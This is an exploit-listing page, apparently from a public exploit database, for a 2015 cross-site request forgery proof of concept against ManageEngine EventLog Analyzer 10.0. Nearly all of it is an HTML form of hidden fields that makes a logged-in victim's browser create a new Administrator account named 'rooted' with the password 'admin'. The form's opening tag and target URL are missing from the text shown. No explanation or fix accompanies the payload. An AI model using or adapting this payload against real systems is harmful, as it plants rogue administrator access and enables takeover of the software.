ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability
| EKU-ID: 4845 | CVE: | OSVDB-ID: |
| Author: Akash S. Chavan | Published: 2015-05-20 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4845 | CVE: | OSVDB-ID: |
| Author: Akash S. Chavan | Published: 2015-05-20 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
<!-- [+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery Exploit [+] Date: 31/03/2015 [+] Exploit Author: Akash S. Chavan [+] Vendor Homepage: https://www.manageengine.com/ [+] Software Link: https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe [+] Version: Version: 10.0, Build Number: 10001 [+] Tested on: Windows 8.1/PostgreSQL --> <html> <body> <input type="hidden" name="domainId" value="" /> <input type="hidden" name="roleId" value="" /> <input type="hidden" name="addField" value="true" /> <input type="hidden" name="userType" value="Administrator" /> <input type="hidden" name="userName" value="rooted" /> <input type="hidden" name="pwd1" value="admin" /> <input type="hidden" name="password" value="admin" /> <input type="hidden" name="userGroup" value="Administrator" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="AddSubmit" value="Add User" /> <input type="hidden" name="alpha" value="" /> <input type="hidden" name="userIds" value="" /> <input type="hidden" name="roleName" value="" /> <input type="hidden" name="selDevices" value="" /> <input type="hidden" name="doAction" value="" /> <input type="hidden" name="productName" value="eventlog" /> <input type="hidden" name="licType" value="Prem" /> <input type="hidden" name="next" value="" /> <input type="hidden" name="currentUserId" value="1" /> <input type="hidden" name="isAdminServer" value="false" /> <input type="submit" value="Click Me" /> </form> </body> </html>